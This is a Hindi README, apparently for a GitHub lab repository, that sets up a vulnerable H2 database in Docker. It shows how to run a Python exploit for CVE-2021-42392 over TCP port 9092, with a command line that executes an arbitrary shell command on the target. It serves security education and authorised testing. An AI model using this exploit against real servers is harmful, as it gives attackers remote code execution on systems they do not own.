
CVE-2021-42392 H2 Database RCE को TCP के माध्यम से परीक्षण करने के लिए नियंत्रित प्रयोगशाला वातावरण। इसमें कमजोर H2 सर्वर, Python शोषण स्क्रिप्ट, और नैतिक प्रवेश परीक्षण एवं शिक्षा के लिए Docker सेटअप शामिल है।
यह रिपॉजिटरी CREATE ALIAS सुविधा का उपयोग करके H2 डेटाबेस रिमोट कोड एग्ज़ीक्यूशन भेद्यता (CVE-2021-42392) का परीक्षण करने के लिए एक न्यूनतम और नियंत्रित वातावरण प्रदान करती है। कई प्रदर्शनों के विपरीत, यह शोषण H2 वेब कंसोल पर निर्भर हुए बिना सीधे H2 TCP सेवा (आमतौर पर पोर्ट 9092 पर) को लक्षित करता है।
🛑 केवल शैक्षिक और परीक्षण उद्देश्यों के लिए। उन सिस्टम पर उपयोग न करें जिनके आप मालिक नहीं हैं या जिनके परीक्षण की स्पष्ट अनुमति नहीं है।
CVE-2021-42392 H2 डेटाबेस संस्करण 2.0.206 से पहले के संस्करणों में एक गंभीर भेद्यता है जो CREATE ALIAS के माध्यम से रिमोट कोड निष्पादन की अनुमति देती है यदि डेटाबेस TCP या वेब कंसोल के माध्यम से खुला हो।
इस परियोजना में शामिल हैं:
2.0.202 चला रहा हैjaydebeapi और JPype का उपयोग करने वाली एक Python शोषण स्क्रिप्टDocker के साथ:
यदि Docker के बाहर शोषण चला रहे हैं:
git clone https://github.com/Be-Innova/CVE-2021-42392-exploit-lab
cd h2-cve-2021-42392-poc
docker compose build
docker compose up -d
docker compose exec client bash
python3 h2_exploit.py --url jdbc:h2:tcp://h2-vulnerable\:9092/~/test --cmd "touch /tmp/pwned" --jar /jars/h2.jar
python3 h2_exploit.py --url <jdbc-url> --cmd "<command>" --jar "path-to-jar"
तर्क:
--url: वल्नरेबल H2 इंस्टेंस का JDBC URL (जैसे jdbc:h2:tcp://192.168.1.100\:9092/~/test)
--cmd: वल्नरेबल सर्वर पर निष्पादित करने का आदेश
--jar: H2 ड्राइवर JAR का वैकल्पिक पथ (डिफ़ॉल्ट: /jars/h2.jar)
Port 9092 खुला होjavac कंपाइलर स्थापित होयह कोड शैक्षिक और नैतिक पैठ परीक्षण के लिए अलग-अलग वातावरण में "जैसा है" प्रदान किया गया है। अनधिकृत प्रणालियों पर इसका उपयोग न करें। लेखक दुरुपयोग के लिए कोई जिम्मेदारी नहीं लेता है।